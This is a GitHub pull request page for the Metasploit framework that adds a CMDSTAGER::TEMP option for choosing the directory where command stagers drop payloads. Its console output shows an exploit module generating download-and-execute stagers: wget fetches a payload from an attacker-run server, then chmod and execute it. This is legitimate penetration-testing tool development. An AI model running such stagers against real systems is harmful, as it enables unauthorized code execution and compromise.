Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CMDSTAGER::TEMP with WritableDir fallback #11467

Merged
merged 1 commit into from Feb 26, 2019

Conversation

Projects
None yet
4 participants
@wvu-r7
Copy link
Contributor

wvu-r7 commented Feb 23, 2019

msf5 exploit(multi/fileformat/ghostscript_failed_restore) > run

[*] Using URL: http://0.0.0.0:8081/zTQAQMOYjita40H
[*] Local IP: http://192.168.1.5:8081/zTQAQMOYjita40H
[*] Generated command stager: ["wget -qO /tmp/pMuePBpB http://192.168.1.5:8081/zTQAQMOYjita40H;chmod +x /tmp/pMuePBpB;/tmp/pMuePBpB;rm -f /tmp/pMuePBpB"]
[+] msf.ps stored at /Users/wvu/.msf4/local/msf.ps
[*] Server stopped.
msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set cmdstager::temp /var/tmp
cmdstager::temp => /var/tmp
msf5 exploit(multi/fileformat/ghostscript_failed_restore) > run

[*] Using URL: http://0.0.0.0:8081/OUIC7m8jC
[*] Local IP: http://192.168.1.5:8081/OUIC7m8jC
[*] Generated command stager: ["wget -qO /var/tmp/DsPPLuNZ http://192.168.1.5:8081/OUIC7m8jC;chmod +x /var/tmp/DsPPLuNZ;/var/tmp/DsPPLuNZ;rm -f /var/tmp/DsPPLuNZ"]
[+] msf.ps stored at /Users/wvu/.msf4/local/msf.ps
[*] Server stopped.
msf5 exploit(multi/fileformat/ghostscript_failed_restore) >

Maybe resolves #11453. Minimally tested.

@wvu-r7 wvu-r7 requested a review from bcoles Feb 23, 2019

@bcoles
Copy link
Contributor

bcoles left a comment

Looks reasonable. Untested.

@busterb busterb self-requested a review Feb 26, 2019

@wvu-r7 wvu-r7 merged commit 659621a into rapid7:master Feb 26, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request Feb 26, 2019

msjenkins-r7 added a commit that referenced this pull request Feb 26, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Feb 26, 2019

Release Notes

This adds the CMDSTAGER::TEMP option to the CmdStager library, allowing users to set a writable directory at runtime for command stagers to drop into. If the option is not set, and the module has the WritableDir option set, then the CmdStager library will fall back on that option.

@wvu-r7 wvu-r7 self-assigned this Feb 26, 2019

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/cmdstager branch Feb 26, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.